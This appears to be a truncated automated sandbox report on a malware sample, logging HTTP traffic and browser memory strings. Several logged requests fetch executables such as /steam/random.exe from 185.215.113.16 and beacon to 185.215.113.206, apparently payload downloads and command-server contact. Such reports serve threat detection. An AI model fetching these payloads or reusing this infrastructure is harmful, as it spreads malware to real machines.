Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 16:30:26 GMTIf-None-Match: "6728f6a2-2d7000"
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 16:30:39 GMTIf-None-Match: "6728f6af-206a00"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 15:50:39 GMTIf-None-Match: "6728ed4f-e0800"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 15:51:04 GMTIf-None-Match: "6728ed68-2aa800"
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UpdateService:selectUpdate - skipping update because the update's application version is not greater than the current application versionhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchUPDATE moz_bookmarks SET position = position - 1 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UpdateService:selectUpdate - skipping update because the update's application version is not greater than the current application versionhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchUPDATE moz_bookmarks SET position = position - 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/data/ua_overrides.jsmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//sdk.js*://static.criteo.net/js/ld/publishertag.jsFileUtils_closeAtomicFileOutputStream://connect.facebook.net//all.js://static.chartbeat.com/js/chartbeat_video.js://www.google-analytics.com/gtm/js*://s0.2mdn.net/instream/html5/ima3.js://imasdk.googleapis.com/js/sdkloader/ima3.jsFileUtils_closeSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0https://smartblock.firefox.etp/play.svg://www.googletagservices.com/tag/js/gpt.jswebcompat-reporter@mozilla.org.xpi://.imgur.io/js/vendor..bundle.js://cdn.branch.io/branch-latest.min.js@mozilla.org/addons/addon-manager-startup;1https://smartblock.firefox.etp/facebook.svg://pub.doubleverify.com/signals/pub.js*://c.amazon-adsystem.com/aax2/apstag.js://auth.9c9media.ca/auth/main.js://www.googletagmanager.com/gtm.js://libs.coremetrics.com/eluminate.js://www.google-analytics.com/analytics.js*://www.rva311.com/static/js/main..chunk.js://track.adform.net/serving/scripts/trackpoint/://www.google-analytics.com/plugins/ua/ec.js://static.chartbeat.com/js/chartbeat.js://ssl.google-analytics.com/ga.js://.imgur.com/js/vendor..bundle.jswebcompat-reporter%40mozilla.org:1.5.1://www.everestjs.net/static/st.v3.js*RemoteSettingsClient - finish IDB access. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000003.3141800421.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3480721237.000001B63DB36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3398991599.000001B63675D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398991599.000001B6367AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B6364C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in 